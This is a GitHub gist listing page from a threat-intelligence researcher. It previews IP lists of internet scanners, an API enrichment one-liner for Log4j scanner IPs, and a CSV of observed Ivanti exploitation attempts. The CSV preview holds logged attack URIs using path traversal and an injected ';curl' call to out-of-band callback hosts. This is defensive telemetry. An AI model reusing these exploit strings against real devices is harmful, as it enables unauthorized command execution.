Skip to content

Instantly share code, notes, and snippets.

View andrew-morris's full-sized avatar
💭
¯\_(ツ)_/¯

Andrew Morris andrew-morris

💭
¯\_(ツ)_/¯
480 followers · 421 following
View GitHub Profile
@andrew-morris
andrew-morris / big_dns_requests.md
Created July 15, 2020 18:59
big dns requests

I'm doing a bit of cursory research into GreyNoise data WRT CVE-2020-1350.

The following IPs have blasted the Internet with large DNS requests (>1000 bytes) in the past 24 hours:

(sorted by packet count)

  16 89.196.51.73
  13 5.209.199.204
  12 62.102.143.106
  10 188.212.245.149
@andrew-morris
andrew-morris / 7aac1a57-4f05-48db-8d55-950674d3eefc.csv
Created October 13, 2021 14:13
IPs scanning or attacking hosts in exclusively Isreal
ip classification first_seen last_seen
20.86.27.229 unknown 2021-10-07 2021-10-13
196.196.216.5 unknown 2021-10-13 2021-10-13
194.147.158.42 malicious 2021-07-26 2021-10-13
20.50.139.51 unknown 2021-05-27 2021-10-13
103.229.41.5 unknown 2021-10-09 2021-10-12
91.211.52.221 malicious 2018-05-19 2021-10-12
116.110.156.140 malicious 2021-10-12 2021-10-12
2.61.251.177 unknown 2021-10-08 2021-10-12
194.147.158.42 malicious 2021-07-26 2021-10-12
@andrew-morris
andrew-morris / greynoise_enrich_cve_2021_44228.sh
Created December 10, 2021 18:38
curl -s https://gist.githubusercontent.com/gnremy/c546c7911d5f876f263309d7161a7217/raw/170f7d6cf92172443ecc68db0b6cbd4d8226a398/CVE-2021-44228_IPs.csv | cut -d, -f1 | while read ip;do curl -XGET -s https://api.greynoise.io/v3/community/$ip;done | jq -s
@andrew-morris
andrew-morris / ivanti.csv
Last active February 8, 2024 09:55
IPs that are scanning for, or exploiting, vulnerable Ivanti devices (a la GreyNoise) - Updated Feb 01 2024
We can make this file beautiful and searchable if this error is corrected: Unclosed quoted field in line 5.
Start Time, Stop Time, Src IP, Src Country, Src ASN Name, URI, URI Path
1705410897884,1705410913832,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code","/api/v1/totp/user-backup-code"
1705427130797,1705427132894,45.77.220.169,US,"AS-CHOOPA","<IP>/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection","/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection"
1705438981268,1705438981905,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me","/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me"
1705439136337,1705439136975,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjev7jug2jtnphga8igpw9kab6pazpi5.oast.pro","/api/v1/totp/user-backup-code/../../
@andrew-morris
andrew-morris / keybase.md
Created March 6, 2024 19:36
keybase.md

Keybase proof

I hereby claim:

  • I am andrew---morris on github.
  • I am morris (https://keybase.io/morris) on keybase.
  • I have a public key whose fingerprint is 1F50 1325 8595 EC49 9A71 8AD1 C0B9 E4CA 97CE 2C60

To claim this, I am signing this object: